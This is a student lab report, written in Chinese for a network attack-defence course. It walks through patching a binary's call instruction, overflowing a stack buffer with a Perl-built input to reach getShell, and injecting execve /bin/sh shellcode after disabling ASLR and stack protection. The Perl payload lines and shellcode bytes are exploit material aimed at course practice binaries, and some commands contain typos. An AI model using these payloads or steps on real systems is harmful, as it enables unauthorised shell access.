# 2018-2019-2 20165210《网络攻防技术》Exp1 PC平台逆向破解（BOF实验）

2018-2019-2 20165210《网络攻防技术》Exp1 PC平台逆向破解（BOF实验）

实验分为三个部分：

1. 手工修改可执行文件，改变程序执行流程，直接跳转到getShell函数。
2. 利用foo函数的Bof漏洞，构造一个攻击输入字符串，覆盖返回地址，触发getShell函数
3. 注入一个自己制作的shellcode并运行这段shellcode。

这几种思路，基本代表现实情况中的攻击目标:

1. 运行原本不可访问的代码片段
2. 强行修改程序执行流
3. 以及注入运行任意代码。

一、直接修改程序机器指令，改变程序执行流程

• 知识要求：Call指令，EIP寄存器,指令跳转的偏移计算，补码，反汇编指令objdump，十六进制编辑工具
• 学习目标：理解可执行文件与机器指令
• 进阶：掌握ELF文件格式，掌握动态技术
  
  首先：反汇编20165210_1文件

objdump -d pwn1

反汇编结束后你发现：main函数里面有一步call 804891，机器码指令为e8 d7 ff ff ff。进一步分析：08048491是，0804847d是我们的跳转目标。

0x08048491 - 0x0804847d = 0x00000014  //计算地址差
0xffffffd7 - 0x00000014 = 0xffffffc3  //计算要篡改的目标地址

然后进入编辑文件，然后发现全是乱码，使用

:%!xxd

转换为16进制，用

/e8d7

来寻找e8d7ffffff机器指令

找到以后按i进入插入模式，修改d7为c3，用

:%!xxd -r

换回乱码的状态，然后保存，再次

objdump -d 20165210_1

就发现改回来了

然后运行一下

就成功了

二、通过构造输入参数，造成BOF攻击，改变程序执行流

缓冲区溢出攻击，即BOF攻击。简单的说就是不合法的输入把子函数的返回地址覆盖掉了，通过这种方式修改函数的返回地址，使程序代码执行“意外”的流程。

使用gdb命令，file 20165210_2载入20165210_2文件，r运行

可以看到图中

0x6c6c6b6b in ?? ()

6c是l的ASCII码值6b是k的ASCII码值

所以根据内容1中的getshell内存地址，修改输入字符串（注意要将实际地址反序录入），然后利用prel构建输入文件。

perl -e 'print "aaaaaaaassssssssddddddffffgghhjj\x7d\x84\x04\x08\x0a"' > input

Perl -e:用于在命令行而不是在脚本中执行 Perl 命令；“|”管道：将第一条命令的结果作为第二条命令的参数来使用；

然后用cat命令：

(cat input; cat ) | ./20165210_2

然后就成功了

三、注入Shellcode并执行

首先;下载execstack并安装

apt-get install execstack

设置堆栈可执行：

execstack -s 20165210_3   //设置堆栈可执行
execstack -q 20165210_3    //查询文件的堆栈是否可执行

关闭地址随机化

echo "0" > /proc/sys/kernel/randomize_va_space

查询地址随机化是否关闭(0代表关闭，2代表开启)

more /proc/sys/kernel/randomize_va_space

整个过程中我们需要注入一段代码，和实验二里面使用的perl类似，我们首先构造一个input_shellcode：

perl -e 'print "A" x 32;print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode

首先在一个窗口运行

(cat input_shellcode;cat) | .20165210_3；

在另外一个窗口

ps -ef | grep 20165210_3

能看见当前运行20165210_3的进程号；

在gdb里面attach 进程号进行调试，(gdb) disassemble foo反编译，设置断点，然后into r esp。

0xffffd2fc+0x000004=0xffffd300

然后修：改shellcode中的内容：

perl -e 'print "A" x 32;print "\x00\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00"' > input-shellcode

运行：

(cat input-shellcode;cat) | ./20165210_3

四、过程中遇到的困难：

1. 首先就是内容一中的将乱码转换为16进制，然后我改完没有再转回乱码，直接保存了，发现就不能反汇编了。
2. 也是内容一就是找e8d7怎么找都找不到，/d7不行/e8不行/e8d7不行，最后打了/e8 d7才成功
3. 最后还有就是内容三的设置断点阶段，我输入了continue发现在continuing就不动了，然后发现另一个终端还要回车一下（我也不是很懂为什么要回车），然后就可以继续进行了。